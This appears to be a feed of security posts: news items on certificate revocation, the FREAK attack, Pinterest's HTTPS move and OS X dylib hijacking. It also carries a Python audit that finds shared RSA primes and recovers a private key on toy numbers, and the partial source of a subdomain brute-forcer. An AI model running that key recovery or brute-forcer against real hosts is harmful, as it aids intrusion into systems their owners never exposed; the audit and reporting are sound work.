In November it fixed a vulnerability that could have allowed an attacker to bypass ASLR and run arbitrary code on a target device under certain circumstances. In January the company took some heat for not fixing a bug in the WebView component of the OS on Jelly Bean 4.3, or older. Security engineers for Android later clarified that the issue would really be best fixed by OEMs and that it’s not practical for Google to push patches for older vulnerabilities. Source
  9. Microsoft has blacklisted a phony SSL certificate that’s been making the rounds and is in the process of warning the general public that the certificate could be leveraged to stage man-in-the-middle attacks. In a security advisory published yesterday the company stressed that an improper certificate for the domain “live.fi” could also be used to spoof content or carry out phishing attacks, but stopped short of saying it could issue other certificates, impersonate other domains, or sign code. The certificate, which corresponds to one of the company’s Live entities, was revoked by its issuer, certificate authority Comodo, and Microsoft has updated its Certificate Trust List (CTL) to reflect the instability. The company maintains an often in-flux Certificate Trust List as a running tally of trusted entities that are rooted to verifiable certificates. Microsoft blamed the botched certificate on a misconfigured privileged email account on the live.fi domain. It sounds like an unauthorized third party was able to register an email account on the domain with a “privileged username,” and in turn used it to request a bogus certificate for live.fi. In a FAQ on its site, Comodo claims that all of its certificates must pass through Domain Control Validation (DCV) before they’re issued. It appears the aforementioned third party used an email (admin@, administrator@, postmaster@, etc.) to prove ownership of the domain and subsequently the certificate. Windows 8, 8.1, RT, RT 8.1, Server 2012 and Server 2012 R2 all contain an automatic updater that takes note of revoked certificates. The company warns that users who either opt not to run that automatic updater or run older setups, including Server 2003, should run the manual update KB2917500 to blacklist the certificate. It’s expected both Google Chrome and Mozilla Firefox will block the certificate over the next several days or so. 
In the very near future Firefox is expected to loop in a new feature, OneCRL, that will supersede the dated Online Certificate Status Protocol (OCSP) and improve upon the process in which the browser reviews and revokes certificates. Source
  10. UPDATE: First the good news: it would seem that large providers and individual server admins have for the most part found and spiked export-grade cipher suites vulnerable to the FREAK attack. The bad news: It would seem it’s even less expensive than first believed to exploit the remaining servers still supporting 512-bit RSA keys. Researchers from Royal Holloway University in London on Monday published a report that demonstrates how an attacker, with a modest amount of computing power, could spare himself an expensive cloud-computing bill and attack servers still vulnerable to FREAK on the cheap. When news of the FREAK (Factoring Related Attack on RSA Keys) attack broke on March 3 from researchers at Microsoft and the French National Institute for Research in Computer Science and Control, a number of widely deployed SSL clients, including OpenSSL, were deemed vulnerable. The attack forces a server to downgrade and accept 512-bit keys, which was the U.S. government-approved key strength for export overseas, a leftover artifact thought to be long-ago abandoned by most clients. “The export-grade RSA ciphers are the remains of a 1980s-vintage effort to weaken cryptography so that intelligence agencies would be able to monitor. This was done badly. So badly, that while the policies were ultimately scrapped, they’re still hurting us today,” cryptographer Matthew Green of Johns Hopkins University explained two weeks ago. “The 512-bit export grade encryption was a compromise between dumb and dumber. In theory it was designed to ensure that the NSA would have the ability to ‘access’ communications, while allegedly providing crypto that was still ‘good enough’ for commercial use. 
Or if you prefer modern terms, think of it as the original ‘golden master key’.” The Royal Holloway study included a scan of the IPv4 address space (using the University of Michigan’s ZMap tool) which found 22.7 million hosts supporting TLS, 2.2 million of which offered export-grade 512-bit RSA keys when probed. Original reports from Microsoft and the French researchers put the original number of vulnerable servers at 26 percent, much higher than the 9.7 percent rendered by this most recent scan. The researchers, Martin R. Albrecht, Davide Papini, Kenneth G. Paterson and Ricardo Villanueva-Polanco, performed a computation using fastgcd software against 1.6 million distinct keys (once duplicates were removed from the original set of 2.2 million supporting the 512-bit keys). In doing so, they were able to factor 90 of the unique RSA moduli (at $100 per), meaning that 90 distinct keys shared moduli, Albrecht said. Because the keys shared moduli, Albrecht said, the factorization was done relatively inexpensively and in less than three minutes on eight 3.3GHz Xeon core systems, and required less than 2GB of RAM. The researchers said they saved the $9,000 that it would have cost to use cloud-based resources to attack each one directly. Albrecht said there were also many repeated moduli, including one cluster of 28,394. “For those keys, we still have to spend $100 dollars, but we can use the result of this computation to break the encryption for all 28,394,” Albrecht said. “These keys were of the form 'N_1 = p * q' and 'N_2 = p * q'. If this happens I still need to factor using a not-so-cheap method, but one factorization allows me to do more damage after.” “In this particular instance, these devices all seem to be consumer/small business level routers from the same manufacturer. The manufacturer simply put the same key on all these devices,” Albrecht told Threatpost, adding that the device may also generate the key from poor randomness. 
“When these devices boot up they generate these keys afresh on the device. If these devices do not have sufficient randomness they might produce the same key,” Albrecht said. “Recall that 'n = p*q' is a modulus for RSA where 'p' and 'q' are random primes (with some additional constraints not of relevance here). If your random number generator spits out the same numbers after each boot you’ll generate the same 'n'.” Knowing the value of these primes undercuts any means of security in the encryption, giving an attacker an easy path to cracking the keys and owning traffic emanating from it. The ability to downgrade crypto to 512 bits is an alarming aspect of the FREAK attack, but almost as equally disturbing is the amount of modulus reuse, Albrecht said. “I only have to factor once to break all traffic using the same modulus. If I already have the factorization because I have access to an affected device I don’t even need to factor,” he said. This article was updated at noon ET with clarifications throughout. Source
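The two weaknesses Albrecht describes, moduli repeated across devices and distinct moduli that share one prime, are both things a defender can audit for in a set of harvested public keys before anyone else does. The block below is an added example, not code from the article or from the Royal Holloway study: it builds a constructed set of four hypothetical host moduli from small, well-known primes (real 512-bit factors would behave identically, only slower), groups identical moduli, runs a pairwise GCD over the distinct ones, and then shows why a single shared prime is fatal by recovering the private exponent of an affected key and decrypting with it.

```python
"""Auditing RSA moduli for reuse and shared prime factors (constructed example)."""
from math import gcd
from itertools import combinations
from collections import defaultdict

# Constructed primes, far smaller than real key factors so the demo runs instantly.
# They stand in for the p and q that a device's RNG is supposed to draw fresh at boot.
P_SHARED = 104729        # the prime two "devices" end up sharing (weak RNG at boot)
Q_A = 1299709
Q_B = 15485863
P_C = 179424673
Q_C = 2038074743

# Hypothetical scan results: one modulus per host index. Host 0 and host 1 share
# P_SHARED; host 3 reuses host 0's modulus outright (the "same key on every unit" case).
SCANNED_MODULI = [
    P_SHARED * Q_A,   # host 0
    P_SHARED * Q_B,   # host 1: different q, same p
    P_C * Q_C,        # host 2: healthy, unrelated key
    P_SHARED * Q_A,   # host 3: identical modulus to host 0
]


def repeated_moduli(moduli):
    """Group host indices by identical modulus; keep only groups with more than one member."""
    groups = defaultdict(list)
    for idx, n in enumerate(moduli):
        groups[n].append(idx)
    return {n: idxs for n, idxs in groups.items() if len(idxs) > 1}


def shared_factors(moduli):
    """Pairwise GCD over distinct moduli.

    A gcd > 1 between two different RSA moduli is a common prime, which factors both.
    This is O(n^2) in the number of keys; the study used a batch-GCD tool (fastgcd) for
    millions of keys, but the test is the same.
    """
    hits = []
    for (i, n_i), (j, n_j) in combinations(enumerate(moduli), 2):
        if n_i == n_j:
            continue  # duplicates are reported by repeated_moduli(), not here
        g = gcd(n_i, n_j)
        if g > 1:
            hits.append((i, j, g))
    return hits


def _modinv(a, m):
    """Modular inverse by the extended Euclidean algorithm (no Python 3.8+ pow() needed)."""
    r0, r1, s0, s1 = a, m, 1, 0
    while r1:
        q = r0 // r1
        r0, r1 = r1, r0 - q * r1
        s0, s1 = s1, s0 - q * s1
    if r0 != 1:
        raise ValueError("no modular inverse")
    return s0 % m


def private_exponent_from_factor(n, p, e=65537):
    """Given one prime factor of n, the other follows by division, and so does d."""
    q = n // p
    if p * q != n:
        raise ValueError("p does not divide n")
    phi = (p - 1) * (q - 1)
    return _modinv(e, phi)


def rsa_roundtrip_ok(n, d, e=65537, message=123456789):
    """Textbook RSA check: encrypt with the public key, decrypt with the recovered d."""
    ciphertext = pow(message, e, n)
    return pow(ciphertext, d, n) == message


if __name__ == "__main__":
    for n, hosts in repeated_moduli(SCANNED_MODULI).items():
        print("identical modulus on hosts %s" % hosts)
    for i, j, g in shared_factors(SCANNED_MODULI):
        print("hosts %d and %d share prime %d" % (i, j, g))
        d = private_exponent_from_factor(SCANNED_MODULI[i], g)
        print("  private exponent of host %d recovered, decryption works: %s"
              % (i, rsa_roundtrip_ok(SCANNED_MODULI[i], d)))
```

Run against a real key inventory, the two audit functions are the useful part: any output at all means the affected certificates should be replaced with keys generated on a host with a seeded RNG, since the factorization step that follows costs the auditor nothing more than a division.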
  11. Pinterest’s journey toward becoming a fully HTTPS website opened a lot of doors, including a potentially profitable one for hackers. The social networking site this week announced that it would begin paying cash rewards through its bug bounty program, upping the stakes from the T-shirt it originally offered last May when it kicked off the Bugcrowd-hosted initiative. The news complements Pinterest’s full adoption of encrypted communication and traffic from its website. “I feel HTTPS will soon be seen as a requirement for anyone doing business online,” said Paul Moreno, security engineering lead on Pinterest’s cloud team. Pinterest spells out the scope of its bounty program on its Bugcrowd page. The company said it will start paying between $25 and $200 for vulnerabilities found on a number of Pinterest properties, including its developer site, iOS and Android mobile applications, API, and ads pages among others. “We have a strong experimentation culture and we feel that HTTPS foundation provides the minimal baseline for us to get higher value bugs,” Moreno told Threatpost. “We are experimenting with the paid approach for these community sourced higher value bugs and will evaluate the program periodically.” Many high-value Internet properties have moved to HTTPS in the wake of the Snowden revelations. The continuous flow of leaked documents demonstrating the breadth of government surveillance and collection of personal data has accelerated a number of tech companies’ migrations to HTTPS. Moreno said that Pinterest’s move to HTTPS, however, was not without its challenges. Standing out among them was the site’s working relationships with content delivery networks (CDNs) that support HTTPS and Pinterest’s digital certificates. Other expected challenges, Moreno said, were some marginal performance issues, older browser support, mixed content warnings, and referral header removal from HTTPS to HTTP sites. 
Once a test was rolled out to its large Pinner community in the U.K., Moreno said some unexpected issues cropped up including CDN content that broke the site’s Pin It functionality and some sitemap files that were not updated to point to HTTPS domains. Those were addressed respectively by orchestrating a DNS change to a new CDN provider, and the implementation of a meta referrer header to support HTTPS tracking to HTTP sites. “In addition, having multiple CDN providers that supported HTTPS gave us options for performance as well as commercial leverage,” Moreno said in a blog post announcing the move. “In the end, we enhanced the privacy of Pinners by enabling encryption while also hindering exploitation by way of man-in-the-middle attacks, session hijacking, content injection, etc. This also paved the way for future products that may require HTTPS to launch,” Moreno said. Source
  12. DLL hijacking has plagued Windows machines back as far as 2000 and provides hackers with a quiet way to gain persistence on a vulnerable machine, or remotely exploit a vulnerable application. And now it’s come to Apple’s Mac OS X. This week at the CanSecWest conference in Vancouver, Synack director of research Patrick Wardle is expected to deliver a talk during which he’ll explain different attacks that abuse dylibs in OS X for many of the same outcomes as with Windows: persistence; process injection; security feature bypass (in this case, Apple Gatekeeper); and remote exploitation. “DLL hijacking has haunted Windows for a while; it’s been abused by malware by a number of malicious adversaries. It’s a fairly widespread attack,” Wardle told Threatpost. “I wondered if it was similar on OS X and I found an attack similar to that. Under the hood, there are technical differences, but it provides the same capabilities. Given you have a vulnerable app on OS X, you can abuse it the same way it’s abused on Windows.” Wardle is also expected to release following his talk source code for a scanner that discovers apps that are vulnerable to his attack. Running his Python script against his own OS X machine, Wardle was able to find 144 binaries vulnerable to different flavors of his dylib hijacking attacks, including Apple’s Xcode, iMovie and Quicktime plugins, Microsoft Word, Excel, and PowerPoint, and third-party apps such as Java, Dropbox, GPG Tools and Adobe plugins. “Windows is vulnerable to DLL hijacking, and now OS X is similarly vulnerable to dylib hijacking,” Wardle said. With DLL and dylib attacks, the concept is essentially the same: an attacker must find a way to get a malicious library into a directory that is loaded by the operating system. Wardle explained one facet of his attack where he was able to find a vulnerable Apple binary in its Photostream Agent that automatically started with iCloud. “It’s perfect for attacker persistence,” Wardle said. 
“You copy a specially crafted dylib into the directory PhotoStream looks for when the app starts, and the attacker’s dylib is loaded into the context of the process. It’s a stealthy way to gain persistence; you’re not creating any new processes, nor modifying any files. You’re planting a single dylib and you’re in.” In another attack, Wardle said he was able to gain automatic and persistent code execution via a process injection against Xcode, Apple’s integrated developer environment. “My malware infects Xcode and any time a developer deploys a new binary, it would also add the malicious code,” Wardle said. “It’s an anonymous propagation vector.” Wardle was also able to remotely bypass Apple’s Gatekeeper security product that limits what software can be downloaded onto an Apple machine and from where, in addition to providing antimalware protection. His malicious dylib code, he said, would be implanted in a download that should be blocked by Gatekeeper because it’s not signed from the Apple App Store. Gatekeeper, however, will load the malicious file remotely giving the attacker code execution, Wardle said. “Gatekeeper normally does a pretty good job of blocking these downloads, but now using this bypass, we can get users to infect themselves,” Wardle said. Wardle is expected to demonstrate an attack that combines all of these components, including the Gatekeeper bypass that when executed uses the dylib hijacking to gain persistence, grabs users’ files and exfiltrates that data to iCloud, and can also send remote commands to the vulnerable machine. Most worrisome, he said, is that his malware went undetected by most antivirus packages, and Apple barely acknowledged his bug reports starting in January other than an automated response, and a thank you and congratulations on his talk being accepted at CanSecWest. “I think things are broken. This abuses legitimate functionality of OS X and it’s not patched,” Wardle said. 
“These attacks are powerful and stealthy, and do a lot of malicious things.” Source
  13. Tearing a page, so to speak, from social media crowdfunding campaigns like last year's ALS Ice Bucket Challenge, the National Archives has turned to Twitter to raise a volunteer workforce of citizen archivists to help transcribe some of millions of digitized documents—including thousands of declassified CIA and Department of Defense files. The goal of the Transcription Challenge: 1,000 transcribed pages of documents by March 23. The Transcription Challenge corresponds with Sunshine Week, an open government campaign originally launched by the Florida Society of Newspaper Editors as Sunshine Sunday in 2002. The event was adopted by the American Society of Newspaper Editors and extended to a week in 2003, and it has since picked up support from the Reporters Committee for the Freedom of the Press, Bloomberg, The Gridiron Club, and the John S. and James L. Knight Foundation. The National Archives is looking for individuals interested in helping to use Twitter and the hashtag #1000pages to claim documents for transcription and tell the Archives' staff what they've found. In addition to CIA and other declassified files, the Archives is offering up a number of other "missions," ranging from National Forest documents and photos to papers of the Continental Congress and records of the Confederate Government. There are also audio recordings of interviews conducted by the 9/11 commission. Source
  14. #!/usr/bin/env python2
# -*- coding: latin-1 -*-
################################################################################
# nullsecurity team
#
# dnsspider.py - multithreaded subdomain bruteforcer
#
# DATE
# 08/16/2012
#
# DESCRIPTION
# A very fast multithreaded bruteforcer of subdomains that leverages a
# wordlist and/or character permutation.
#
# AUTHOR
# noptrix - http://www.nullsecurity.net/
#
# NOTES:
# quick'n'dirty code
#
# TODO:
# - attack while mutating -> don't generate whole list when using -t 1
#
# CHANGELOG:
# v0.6
# - upgraded default wordlist
# - replaced optionparser with argparse
# - add version output option
# - fixed typo
#
# v0.5
# - fixed extracted ip addresses from rrset answers
# - renamed file (removed version string)
# - removed trailing whitespaces
# - removed color output
# - changed banner
#
# v0.4
# - fixed a bug for returned list
# - added postfix option
# - upgraded wordlist[]
# - colorised output
# - changed error messages
#
# v0.3:
# - added verbose/quiet mode - default is quiet now
# - fixed try/catch for domainnames
# - fixed some tab width (i normally use <= 80 chars per line)
#
# v0.2:
# - append DNS and IP output to found list
# - added diffound list for subdomains resolved to different addresses
# - get right ip address from current used iface to avoid socket problems
# - fixed socket exception syntax and output
# - added usage note for fixed port and multithreaded socket exception
#
# v0.1:
# - initial release
################################################################################

import sys
import time
import string
import itertools
import socket
import threading
import re
import argparse

try:
    import dns.message
    import dns.query
except ImportError:
    print("[-] ERROR: you need 'dnspython' package")
    sys.exit()

BANNER = '--==[ dnsspider by noptrix@nullsecurity.net ]==--'
USAGE = '\n\n' \
        '  dnsspider.py -t <arg> -a <arg> [options]'
VERSION = 'v0.6'

defaults = {}
hostnames = []
prefix = ''
postfix = ''
found = []
diffound = []
chars = string.ascii_lowercase
digits = string.digits

# default wordlist
wordlist = [
'0', '01', '02', '03', '1', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '2', '20', '3', '3com', '4', '5', '6', '7', '8', '9', 'ILMI', 'a', 'a.auth-ns', 'a01', 'a02', 'a1', 'a2', 'abc', 'about', 'ac', 'academico', 'acceso', 'access', 'accounting', 'accounts', 'acid', 'activestat', 'ad', 'adam', 'adkit', 'adm', 'admin', 'administracion', 'administrador', 'administrator', 'administrators', 'admins', 'ads', 'adserver', 'adsl', 'ae', 'af', 'affiliate', 'affiliates', 'afiliados', 'ag', 'agenda', 'agent', 'ai', 'aix', 'ajax', 'ak', 'akamai', 'al', 'alabama', 'alaska', 'albuquerque', 'alerts', 'alpha', 'alterwind', 'am', 'amarillo', 'americas', 'an', 'anaheim', 'analyzer', 'announce', 'announcements', 'antivirus', 'ao', 'ap', 'apache', 'apollo', 'app', 'app01', 'app1', 'apple', 'application', 'applications', 'apps', 'appserver', 'aq', 'ar', 'archie', 'arcsight', 'argentina', 'arizona', 'arkansas', 'arlington', 'as', 'as400', 'asia', 'asterix', 'at', 'athena', 'atlanta', 'atlas', 'att', 'au', 'auction', 'austin', 'auth', 'auto', 'autodiscover', 'autorun', 'av', 'aw', 'ayuda', 'az', 'b', 'b.auth-ns', 'b01', 'b02', 'b1', 'b2', 'b2b', 'b2c', 'ba', 'back', 'backend', 'backup', 'backups', 'baker', 'bakersfield', 'balance', 'balancer', 'baltimore', 'banking', 'bayarea', 'bb', 'bbdd', 'bbs', 'bd', 'bdc', 'be', 'bea', 'beta', 'bf', 'bg', 'bh', 'bi', 'bill', 'billing', 'biz', 'biztalk', 'bj', 'black', 'blackberry', 'blog', 'blogs', 'blue', 'bm', 'bn', 'bnc', 'bo', 'board', 'bob', 'bof', 'boise', 'bolsa', 'border', 'boston', 'boulder', 'boy', 'br', 'bravo', 'brazil', 'britian', 'broadcast', 'broker', 'bronze', 'brown', 
'bs', 'bsd', 'bsd0', 'bsd01', 'bsd02', 'bsd1', 'bsd2', 'bt', 'bug', 'buggalo', 'bugs', 'bugzilla', 'build', 'bulletins', 'burn', 'burner', 'buscador', 'buy', 'bv', 'bw', 'by', 'bz', 'c', 'c.auth-ns', 'ca', 'cache', 'cafe', 'calendar', 'california', 'call', 'calvin', 'canada', 'canal', 'canon', 'careers', 'cart', 'catalog', 'cc', 'cd', 'cdburner', 'cdn', 'central', 'cert', 'certificates', 'certify', 'certserv', 'certsrv', 'cf', 'cg', 'cgi', 'ch', 'channel', 'channels', 'charlie', 'charlotte', 'chat', 'chats', 'chatserver', 'check', 'checkpoint', 'chi', 'chicago', 'ci', 'cims', 'cincinnati', 'cisco', 'citrix', 'ck', 'cl', 'class', 'classes', 'classifieds', 'classroom', 'cleveland', 'cli', 'clicktrack', 'client', 'clientes', 'clients', 'club', 'clubs', 'cluster', 'clusters', 'cm', 'cmail', 'cms', 'cn', 'co', 'cocoa', 'code', 'coldfusion', 'colombus', 'colorado', 'columbus', 'com', 'commerce', 'commerceserver', 'communigate', 'community', 'compaq', 'compras', 'con', 'concentrator', 'conf', 'conference', 'conferencing', 'confidential', 'connect', 'connecticut', 'consola', 'console', 'consult', 'consultant', 'consultants', 'consulting', 'consumer', 'contact', 'content', 'contracts', 'control', 'controller', 'core', 'core0', 'core01', 'corp', 'corpmail', 'corporate', 'correo', 'correoweb', 'cortafuegos', 'counterstrike', 'courses', 'cr', 'cricket', 'crm', 'crs', 'cs', 'cso', 'css', 'ct', 'cu', 'cust1', 'cust10', 'cust100', 'cust101', 'cust102', 'customer', 'customers', 'cv', 'cvs', 'cx', 'cy', 'cz', 'd', 'dallas', 'data', 'database', 'database01', 'database02', 'database1', 'database2', 'databases', 'datastore', 'datos', 'david', 'db', 'db0', 'db01', 'db02', 'db1', 'db2', 'dc', 'de', 'dealers', 'dec', 'def', 'default', 'defiant', 'delaware', 'dell', 'delta', 'delta1', 'demo', 'demonstration', 'demos', 'denver', 'depot', 'des', 'desarrollo', 'descargas', 'design', 'designer', 'desktop', 'detroit', 'dev', 'dev0', 'dev01', 'dev1', 'devel', 'develop', 'developer', 
'developers', 'development', 'device', 'devserver', 'devsql', 'dhcp', 'dial', 'dialup', 'digital', 'dilbert', 'dir', 'direct', 'directory', 'disc', 'discovery', 'discuss', 'discussion', 'discussions', 'disk', 'disney', 'distributer', 'distributers', 'dj', 'dk', 'dm', 'dmail', 'dmz', 'dnews', 'dns', 'dns-2', 'dns0', 'dns1', 'dns2', 'dns3', 'do', 'doc', 'docs', 'document', 'documentacion', 'documentos', 'domain', 'domains', 'dominio', 'domino', 'dominoweb', 'doom', 'download', 'downloads', 'downtown', 'dragon', 'drupal', 'dsl', 'dyn', 'dynamic', 'dynip', 'dz', 'e', 'e-com', 'e-commerce', 'e0', 'eaccess', 'eagle', 'earth', 'east', 'ec', 'echo', 'ecom', 'ecommerce', 'edi', 'edu', 'education', 'edward', 'ee', 'eg', 'eh', 'ejemplo', 'elpaso', 'email', 'employees', 'empresa', 'empresas', 'en', 'enable', 'eng', 'eng01', 'eng1', 'engine', 'engineer', 'engineering', 'enterprise', 'epsilon', 'er', 'erp', 'es', 'esd', 'esm', 'espanol', 'estadisticas', 'esx', 'et', 'eta', 'europe', 'events', 'example', 'examples', 'exchange', 'exec', 'exit', 'ext', 'extern', 'external', 'extranet', 'f', 'f5', 'falcon', 'farm', 'faststats', 'fax', 'feedback', 'feeds', 'fi', 'field', 'file', 'files', 'fileserv', 'fileserver', 'filestore', 'filter', 'finance', 'find', 'finger', 'firewall', 'fix', 'fixes', 'fj', 'fk', 'fl', 'flash', 'florida', 'flow', 'fm', 'fo', 'foobar', 'formacion', 'foro', 'foros', 'fortworth', 'forum', 'forums', 'foto', 'fotos', 'foundry', 'fox', 'foxtrot', 'fr', 'france', 'frank', 'fred', 'freebsd', 'freebsd0', 'freebsd01', 'freebsd02', 'freebsd1', 'freebsd2', 'freeware', 'fresno', 'front', 'frontdesk', 'fs', 'fsp', 'ftp', 'ftp-', 'ftp0', 'ftp2', 'ftpserver', 'fw', 'fw-1', 'fw1', 'fwsm', 'fwsm0', 'fwsm01', 'fwsm1', 'g', 'ga', 'galeria', 'galerias', 'galleries', 'gallery', 'games', 'gamma', 'gandalf', 'gate', 'gatekeeper', 'gateway', 'gauss', 'gd', 'ge', 'gemini', 'general', 'george', 'georgia', 'germany', 'gf', 'gg', 'gh', 'gi', 'git', 'gl', 'glendale', 'gm', 'gmail', 'gn', 
'go', 'gold', 'goldmine', 'golf', 'gopher', 'gp', 'gq', 'gr', 'green', 'group', 'groups', 'groupwise', 'gs', 'gsx', 'gt', 'gu', 'guest', 'gw', 'gw1', 'gy', 'h', 'hal', 'halflife', 'hawaii', 'hello', 'help', 'helpdesk', 'helponline', 'henry', 'hermes', 'hi', 'hidden', 'hk', 'hm', 'hn', 'hobbes', 'hollywood', 'home', 'homebase', 'homer', 'honeypot', 'honolulu', 'host', 'host1', 'host3', 'host4', 'host5', 'hotel', 'hotjobs', 'houstin', 'houston', 'howto', 'hp', 'hpc', 'hpov', 'hr', 'ht', 'http', 'https', 'hu', 'hub', 'humanresources', 'i', 'ia', 'ias', 'ibm', 'ibmdb', 'id', 'ida', 'idaho', 'ids', 'ie', 'iis', 'il', 'illinois', 'im', 'image', 'images', 'imail', 'imap', 'imap4', 'img', 'img0', 'img01', 'img02', 'imgs', 'in', 'inbound', 'inc', 'include', 'incoming', 'india', 'indiana', 'indianapolis', 'info', 'informix', 'inside', 'install', 'int', 'interface', 'intern', 'internal', 'international', 'internet', 'intl', 'intranet', 'invalid', 'investor', 'investors', 'io', 'iota', 'iowa', 'ip6', 'iplanet', 'ipmonitor', 'ipsec', 'ipsec-gw', 'ipv6', 'iq', 'ir', 'irc', 'ircd', 'ircserver', 'ireland', 'iris', 'irvine', 'irving', 'is', 'isa', 'isaserv', 'isaserver', 'ism', 'israel', 'isync', 'it', 'italy', 'ix', 'j', 'jabber', 'japan', 'java', 'jboss', 'je', 'jedi', 'jm', 'jo', 'jobs', 'john', 'jp', 'jrun', 'juegos', 'juliet', 'juliette', 'juniper', 'jupiter', 'k', 'kansas', 'kansascity', 'kappa', 'kb', 'ke', 'kentucky', 'kerberos', 'keynote', 'kg', 'kh', 'ki', 'kilo', 'king', 'km', 'kn', 'knowledgebase', 'knoxville', 'koe', 'korea', 'kp', 'kr', 'ks', 'kw', 'ky', 'kz', 'l', 'la', 'lab', 'laboratory', 'labs', 'lambda', 'lan', 'laptop', 'laserjet', 'lasvegas', 'launch', 'lb', 'lc', 'ldap', 'legal', 'leo', 'li', 'lib', 'library', 'lima', 'lincoln', 'link', 'linux', 'linux0', 'linux01', 'linux02', 'linux1', 'linux2', 'lista', 'lists', 'listserv', 'listserver', 'live', 'lk', 'load', 'loadbalancer', 'local', 'localhost', 'log', 'log0', 'log01', 'log02', 'log1', 'log2', 'logfile', 
'logfiles', 'logger', 'logging', 'loghost', 'login', 'logs', 'london', 'longbeach', 'losangeles', 'lotus', 'louisiana', 'lr', 'ls', 'lt', 'lu', 'luke', 'lv', 'ly', 'lyris', 'm', 'ma', 'mac', 'mac1', 'mac10', 'mac11', 'mac2', 'mac3', 'mac4', 'mac5', 'mach', 'macintosh', 'madrid', 'mail', 'mail2', 'mailer', 'mailgate', 'mailhost', 'mailing', 'maillist', 'maillists', 'mailroom', 'mailserv', 'mailsite', 'mailsrv', 'main', 'maine', 'maint', 'mall', 'manage', 'management', 'manager', 'managers', 'manufacturing', 'map', 'mapas', 'maps', 'marketing', 'marketplace', 'mars', 'marvin', 'mary', 'maryland', 'massachusetts', 'master', 'max', 'mc', 'mci', 'md', 'mdaemon', 'me', 'media', 'member', 'members', 'memphis', 'mercury', 'merlin', 'messages', 'messenger', 'mg', 'mgmt', 'mh', 'mi', 'miami', 'michigan', 'mickey', 'midwest', 'mike', 'milwaukee', 'minneapolis', 'minnesota', 'mirror', 'mis', 'mississippi', 'missouri', 'mk', 'ml', 'mm', 'mn', 'mngt', 'mo', 'mobile', 'mom', 'monitor', 'monitoring', 'montana', 'moon', 'moscow', 'movies', 'mozart', 'mp', 'mp3', 'mpeg', 'mpg', 'mq', 'mr', 'mrtg', 'ms', 'ms-exchange', 'ms-sql', 'msexchange', 'mssql', 'mssql0', 'mssql01', 'mssql1', 'mt', 'mta', 'mtu', 'mu', 'multimedia', 'music', 'mv', 'mw', 'mx', 'mx01', 'my', 'mysql', 'mysql0', 'mysql01', 'mysql1', 'mz', 'n', 'na', 'name', 'names', 'nameserv', 'nameserver', 'nas', 'nashville', 'nat', 'nc', 'nd', 'nds', 'ne', 'nebraska', 'neptune', 'net', 'netapp', 'netdata', 'netgear', 'netmail', 'netmeeting', 'netscaler', 'netscreen', 'netstats', 'network', 'nevada', 'new', 'newhampshire', 'newjersey', 'newmexico', 'neworleans', 'news', 'newsfeed', 'newsfeeds', 'newsgroups', 'newton', 'newyork', 'newzealand', 'nf', 'ng', 'nh', 'ni', 'nigeria', 'nj', 'nl', 'nm', 'nms', 'nntp', 'no', 'noc', 'node', 'nokia', 'nombres', 'nora', 'north', 'northcarolina', 'northdakota', 'northeast', 'northwest', 'noticias', 'novell', 'november', 'np', 'nr', 'ns', 'ns-', 'ns0', 'ns01', 'ns02', 'ns1', 'ns2', 'ns3', 'ns4', 
'ns5', 'nt', 'nt4', 'nt40', 'ntmail', 'ntp', 'ntserver', 'nu', 'null', 'nv', 'ny', 'nz', 'o', 'oakland', 'ocean', 'odin', 'office', 'offices', 'oh', 'ohio', 'ok', 'oklahoma', 'oklahomacity', 'old', 'om', 'omaha', 'omega', 'omicron', 'online', 'ontario', 'op', 'open', 'openbsd', 'openview', 'operations', 'ops', 'ops0', 'ops01', 'ops02', 'ops1', 'ops2', 'opsware', 'or', 'oracle', 'orange', 'order', 'orders', 'oregon', 'orion', 'orlando', 'oscar', 'out', 'outbound', 'outgoing', 'outlook', 'outside', 'ov', 'owa', 'owa01', 'owa02', 'owa1', 'owa2', 'ows', 'oxnard', 'p', 'pa', 'page', 'pager', 'pages', 'paginas', 'papa', 'paris', 'parners', 'partner', 'partners', 'patch', 'patches', 'paul', 'payroll', 'pbx', 'pc', 'pc01', 'pc1', 'pc10', 'pc101', 'pc11', 'pc12', 'pc13', 'pc14', 'pc15', 'pc16', 'pc17', 'pc18', 'pc19', 'pc2', 'pc20', 'pcmail', 'pda', 'pdc', 'pe', 'pegasus', 'pennsylvania', 'peoplesoft', 'personal', 'pf', 'pg', 'pgp', 'ph', 'phi', 'philadelphia', 'phoenix', 'phoeniz', 'phone', 'phones', 'photos', 'phpmyadmin', 'pi', 'pics', 'pictures', 'pink', 'pipex-gw', 'pittsburgh', 'pix', 'pk', 'pki', 'pl', 'plano', 'platinum', 'plesk', 'pluto', 'pm', 'pm1', 'pma', 'pn', 'po', 'policy', 'polls', 'pop', 'pop3', 'portal', 'portals', 'portfolio', 'portland', 'post', 'postales', 'postoffice', 'ppp1', 'ppp10', 'ppp11', 'ppp12', 'ppp13', 'ppp14', 'ppp15', 'ppp16', 'ppp17', 'ppp18', 'ppp19', 'ppp2', 'ppp20', 'ppp21', 'ppp3', 'ppp4', 'ppp5', 'ppp6', 'ppp7', 'ppp8', 'ppp9', 'pptp', 'pr', 'pre', 'prensa', 'press', 'printer', 'printserv', 'printserver', 'priv', 'privacy', 'private', 'problemtracker', 'products', 'profiles', 'project', 'projects', 'promo', 'proxy', 'prueba', 'pruebas', 'ps', 'psi', 'pss', 'pt', 'pub', 'public', 'pubs', 'purple', 'pw', 'py', 'q', 'qa', 'qmail', 'qotd', 'quake', 'quebec', 'queen', 'quotes', 'r', 'r01', 'r02', 'r1', 'r2', 'ra', 'rack', 'radio', 'radius', 'rapidsite', 'raptor', 'ras', 'rc', 'rcs', 'rd', 're', 'read', 'realserver', 'recruiting', 'red', 
